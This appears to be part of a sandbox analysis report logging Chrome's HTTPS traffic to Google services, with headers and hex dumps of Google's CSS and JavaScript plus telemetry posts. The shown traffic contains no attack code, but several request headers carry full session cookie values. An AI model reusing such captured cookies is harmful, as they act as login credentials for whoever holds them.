                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI; OGPC=19037049-1:
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC818INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="gws-team"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 507580
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:20 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Sep 2025 14:41:20 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 26 Sep 2024 19:25:19 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC572INData Raw: 5f 46 5f 69 6e 73 74 61 6c 6c 43 73 73 28 22 63 2d 77 69 7a 7b 63 6f 6e 74 61 69 6e 3a 73 74 79 6c 65 7d 63 2d 77 69 7a 3e 63 2d 64 61 74 61 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 63 2d 77 69 7a 2e 72 45 54 53 44 7b 63 6f 6e 74 61 69 6e 3a 6e 6f 6e 65 7d 63 2d 77 69 7a 2e 55 62 69 38 5a 7b 63 6f 6e 74 61 69 6e 3a 6c 61 79 6f 75 74 20 73 74 79 6c 65 7d 2e 6a 62 42 49 74 66 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 44 55 30 4e 4a 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 2e 6c 50 33 4a 6f 66 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c
                                                                                                                                                                                                                                                                                          Data Ascii: _F_installCss("c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:none}c-wiz.Ubi8Z{contain:layout style}.jbBItf{display:block;position:relative}.DU0NJ{bottom:0;left:0;position:absolute;right:0;top:0}.lP3Jof{display:inline-block;position:rel
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC1390INData Raw: 68 2c 71 6c 69 2d 62 6c 75 65 2d 66 61 64 65 2d 69 6e 2d 6f 75 74 20 35 33 33 32 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 7d 2e 6e 4e 4d 75 4f 64 20 2e 49 45 71 69 41 66 7b 61 6e 69 6d 61 74 69 6f 6e 3a 71 6c 69 2d 66 69 6c 6c 2d 75 6e 66 69 6c 6c 2d 72 6f 74 61 74 65 20 35 33 33 32 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 2c 71 6c 69 2d 72 65 64 2d 66 61 64 65 2d 69 6e 2d 6f 75 74 20 35 33 33 32 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 7d 2e 6e 4e 4d 75 4f 64 20 2e 73 6d 6f 63 73 65 7b 61 6e 69 6d 61 74
                                                                                                                                                                                                                                                                                          Data Ascii: h,qli-blue-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .IEqiAf{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-red-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .smocse{animat
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC1390INData Raw: 61 63 69 74 79 3a 30 2e 39 39 7d 39 30 25 7b 6f 70 61 63 69 74 79 3a 30 2e 39 39 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 7d 2e 62 65 44 51 50 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 69 64 74 68 3a 35 30 25 7d 2e 46 63 58 66 69 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 34 35 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 25 7d 2e 53 50 4b 46 6d 63 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62
                                                                                                                                                                                                                                                                                          Data Ascii: acity:0.99}90%{opacity:0.99}100%{opacity:0}}.beDQP{display:inline-block;height:100%;overflow:hidden;position:relative;width:50%}.FcXfi{box-sizing:border-box;height:100%;left:45%;overflow:hidden;position:absolute;top:0;width:10%}.SPKFmc{border-radius:50%;b
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC1390INData Raw: 20 2e 74 53 33 50 35 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 45 70 46 4e 57 29 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 40 6b 65 79 66 72 61 6d 65 73 20 71 6c 69 2d 6c 65 66 74 2d 73 70 69 6e 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 33 30 64 65 67 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 35 64 65 67 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 33 30 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 71 6c 69 2d 72 69 67 68 74 2d 73 70 69 6e 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 33 30 64 65 67 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35
                                                                                                                                                                                                                                                                                          Data Ascii: .tS3P5{border-color:var(--EpFNW);border-bottom-color:transparent}@keyframes qli-left-spin{0%{transform:rotate(130deg)}50%{transform:rotate(-5deg)}100%{transform:rotate(130deg)}}@keyframes qli-right-spin{0%{transform:rotate(-130deg)}50%{transform:rotate(5
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC1390INData Raw: 30 25 7d 2e 5a 65 56 42 74 63 7b 63 6f 6c 6f 72 3a 72 67 62 28 39 35 2c 39 39 2c 31 30 34 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 5c 22 47 6f 6f 67 6c 65 20 53 61 6e 73 5c 22 2c 52 6f 62 6f 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 33 30 30 70 78 7d 2e 61 6c 54 42 51 65 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 32 35 32 2c 32 33 32 2c 32 33 30 29 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 38 70 78 3b 6a 75 73 74 69 66 79
                                                                                                                                                                                                                                                                                          Data Ascii: 0%}.ZeVBtc{color:rgb(95,99,104);font-family:\"Google Sans\",Roboto,Arial,sans-serif;font-size:16px;line-height:25px;max-width:300px}.alTBQe{align-items:center;background-color:rgb(252,232,230);border-top-left-radius:8px;border-top-right-radius:8px;justify
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC1390INData Raw: 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 32 30 70 78 7d 2e 50 58 54 36 63 64 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 34 70 78 7d 2e 63 42 39 4d 37 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 32 31 38 2c 32 32 30 2c 32 32 34 29 3b 63 6f 6c 6f 72 3a 72 67 62 28 36 30 2c 36 34 2c 36 37 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 36 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61
                                                                                                                                                                                                                                                                                          Data Ascii: ,sans-serif;font-size:14px;margin-left:20px;margin-right:20px}.PXT6cd{display:flex;margin-top:14px}.cB9M7{background-color:#fff;border:1px solid rgb(218,220,224);color:rgb(60,64,67);border-radius:36px;display:inline-flex;flex-grow:1;font-size:14px;font-fa
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC1390INData Raw: 79 7b 0a 5f 2e 77 28 22 61 61 22 29 3b 0a 0a 5f 2e 79 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 61 62 64 22 29 3b 0a 76 61 72 20 6f 67 69 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 22 22 2c 63 3d 32 31 2c 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 64 25 34 21 3d 33 26 26 28 62 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 61 5b 64 5d 5e 63 29 2c 63 2b 2b 29 3b 72 65 74 75 72 6e 20 62 7d 2c 70 67 69 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 30 2c 63 3b 66 6f 72 28 63 20 69 6e 20 61 29 69 66 28 61 5b 63 5d 2e 65 29 69 66 28 61 5b 63 5d 2e 62 29 62 2b 2b 3b 65 6c 73 65 20 72 65 74 75 72 6e 21
                                                                                                                                                                                                                                                                                          Data Ascii: y{_.w("aa");_.y();}catch(e){_._DumpException(e)}try{_.w("abd");var ogi=function(a){for(var b="",c=21,d=0;d<a.length;d++)d%4!=3&&(b+=String.fromCharCode(a[d]^c),c++);return b},pgi=function(a){var b=0,c;for(c in a)if(a[c].e)if(a[c].b)b++;else return!
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC1390INData Raw: 29 3b 62 2e 4b 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 43 6c 69 65 6e 74 2d 50 63 74 78 22 2c 5f 2e 51 6b 28 62 29 29 3b 62 3d 5f 2e 4c 63 28 22 71 66 49 30 5a 63 22 29 3b 62 2e 4b 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 53 65 61 72 63 68 2d 43 69 2d 46 69 22 2c 5f 2e 51 6b 28 62 29 29 3b 62 3d 5f 2e 4c 63 28 22 41 55 66 37 71 63 22 29 3b 62 2e 4b 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 53 69 6c 6b 2d 43 61 70 61 62 69 6c 69 74 69 65 73 22 2c 5f 2e 51 6b 28 62 29 29 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 4b 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 22 7d 3b 5f 2e 7a 4b 62 3d 21 31 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f
                                                                                                                                                                                                                                                                                          Data Ascii: );b.Kb()&&a.set("X-Client-Pctx",_.Qk(b));b=_.Lc("qfI0Zc");b.Kb()&&a.set("X-Search-Ci-Fi",_.Qk(b));b=_.Lc("AUf7qc");b.Kb()&&a.set("X-Silk-Capabilities",_.Qk(b));return a};}catch(e){_._DumpException(e)}try{_.yKb=function(){return""};_.zKb=!1;}catch(e){_
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC1390INData Raw: 4d 61 70 3a 65 2e 63 6f 6e 74 65 78 74 3b 76 61 72 20 6b 3d 65 2e 7a 66 3d 3d 3d 76 6f 69 64 20 30 3f 6e 65 77 20 4d 61 70 3a 65 2e 7a 66 3b 76 61 72 20 6c 3d 65 2e 61 47 3b 76 61 72 20 70 3d 65 2e 56 6e 62 3b 76 61 72 20 72 3d 65 2e 72 37 3b 76 61 72 20 74 3d 65 2e 68 4a 3b 76 61 72 20 78 3d 65 2e 4c 64 63 3b 65 3d 65 2e 71 24 61 3b 67 3d 67 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 67 3b 68 3d 6e 65 77 20 4d 61 70 28 5b 5d 2e 63 6f 6e 63 61 74 28 5f 2e 6c 64 28 68 29 29 29 3b 68 2e 68 61 73 28 22 5f 66 6d 74 22 29 7c 7c 68 2e 73 65 74 28 22 5f 66 6d 74 22 2c 22 70 72 6f 67 22 29 3b 66 26 26 68 2e 73 65 74 28 22 5f 69 64 22 2c 66 29 3b 28 66 3d 61 2e 66 79 61 29 26 26 68 2e 73 65 74 28 22 5f 78 73 72 66 22 2c 66 29 3b 6b 3d 6e 65 77 20 4d 61 70 28 6b 29 3b
                                                                                                                                                                                                                                                                                          Data Ascii: Map:e.context;var k=e.zf===void 0?new Map:e.zf;var l=e.aG;var p=e.Vnb;var r=e.r7;var t=e.hJ;var x=e.Ldc;e=e.q$a;g=g===void 0?!1:g;h=new Map([].concat(_.ld(h)));h.has("_fmt")||h.set("_fmt","prog");f&&h.set("_id",f);(f=a.fya)&&h.set("_xsrf",f);k=new Map(k);
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC1390INData Raw: 29 26 26 78 2e 73 65 74 28 22 76 65 74 22 2c 64 29 29 3b 66 3f 28 78 2e 73 65 74 28 22 76 65 64 22 2c 66 29 2c 67 6f 6f 67 6c 65 2e 6b 42 4c 26 26 78 2e 73 65 74 28 22 62 6c 22 2c 67 6f 6f 67 6c 65 2e 6b 42 4c 29 2c 67 6f 6f 67 6c 65 2e 73 6e 26 26 78 2e 73 65 74 28 22 73 22 2c 67 6f 6f 67 6c 65 2e 73 6e 29 29 3a 78 2e 73 65 74 28 22 65 69 22 2c 65 7c 7c 28 30 2c 5f 2e 56 6b 2e 76 7a 29 28 29 29 3b 67 26 26 78 2e 73 65 74 28 22 6c 65 69 22 2c 67 29 3b 5f 2e 4a 6a 61 28 78 2c 21 31 2c 21 30 29 3b 67 6f 6f 67 6c 65 2e 75 64 6d 26 26 78 2e 73 65 74 28 22 75 64 6d 22 2c 67 6f 6f 67 6c 65 2e 75 64 6d 29 3b 5f 2e 49 71 62 28 78 29 3b 78 2e 73 65 74 28 22 79 76 22 2c 22 33 22 29 3b 62 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 7a 2c 42 29 7b 78 2e 73
                                                                                                                                                                                                                                                                                          Data Ascii: )&&x.set("vet",d));f?(x.set("ved",f),google.kBL&&x.set("bl",google.kBL),google.sn&&x.set("s",google.sn)):x.set("ei",e||(0,_.Vk.vz)());g&&x.set("lei",g);_.Jja(x,!1,!0);google.udm&&x.set("udm",google.udm);_.Iqb(x);x.set("yv","3");b.forEach(function(z,B){x.s


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          45192.168.2.749795142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1397OUTGET /client_204?atyp=i&biw=1280&bih=907&ei=CsT2Zo-iIaySxc8Pn72EmA8&opi=89978449 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI; OGPC=19037049-1:
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC758INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-S8xNFb6aKnZY0FW0pCoNCQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:20 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          46192.168.2.749798142.250.185.1424435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC1083OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: play.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 2006
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=1-jP50VdntYJdUmLGhd4IH-fKwayJuWzEtgEzrCcF9uJbqMxc-lGo_azGSyuo8flOPRdgGAhTS_zQD91euKYwm2UDU2l5wCr8i5jVFbHNH7gCV2i-OdMEh435nEWJS1O2sysBHD9Et_d-recXkdU0jBp1ViT9rYioYfR9uH0pTk693iSXfACzsSMnZKBnGgMZY-IRpOttdQ
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC2006OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 32 37 34 34 38 30 37 37 33 30 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                                                          Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[1,0,0,0,0]]],373,[["1727448077300",null,null,null,
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:21 UTC518INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:21 GMT
                                                                                                                                                                                                                                                                                          Server: Playlog
                                                                                                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:21 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          47192.168.2.749803142.250.185.1424435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC539OUTOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: play.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Accept: */*
